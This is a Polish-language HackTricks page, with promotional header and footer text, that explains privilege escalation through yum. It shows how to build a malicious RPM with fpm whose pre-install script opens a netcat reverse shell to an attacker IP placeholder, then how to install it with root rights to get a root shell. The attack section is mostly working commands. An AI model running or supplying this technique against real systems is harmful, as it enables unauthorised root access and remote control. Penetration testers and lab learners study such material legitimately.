3.9 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Dodatkowe przykłady dotyczące yum można również znaleźć na stronie gtfobins.
Wykonywanie dowolnych poleceń za pomocą pakietów RPM
Sprawdzanie środowiska
Aby wykorzystać ten wektor, użytkownik musi mieć możliwość wykonywania poleceń yum jako użytkownik o wyższych uprawnieniach, tj. root.
Przykład działającego wektora
Przykład działającego wykorzystania tego exploitu można znaleźć w pokoju daily bugle na platformie tryhackme.
Pakowanie RPM
W następnej sekcji omówię pakowanie odwróconego powłoki (reverse shell) do pakietu RPM za pomocą narzędzia fpm.
Poniższy przykład tworzy pakiet, który zawiera wyzwalacz przed instalacją z dowolnym skryptem, który może być zdefiniowany przez atakującego. Po zainstalowaniu tego pakietu zostanie wykonane dowolne polecenie. Przykładem jest prosty odwrócony shell netcat, który można zmienić według potrzeb.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Przechwytywanie powłoki
Korzystając z powyższego przykładu i zakładając, że yum
może być uruchomiony jako użytkownik o wyższych uprawnieniach.
- Przenieś pakiet rpm na hosta.
- Uruchom nasłuchiwanie na swoim lokalnym hoście, na przykład przykładowy nasłuch netcat.
- Zainstaluj podatny pakiet
yum localinstall -y exploited-1.0-1.noarch.rpm
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi trikami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.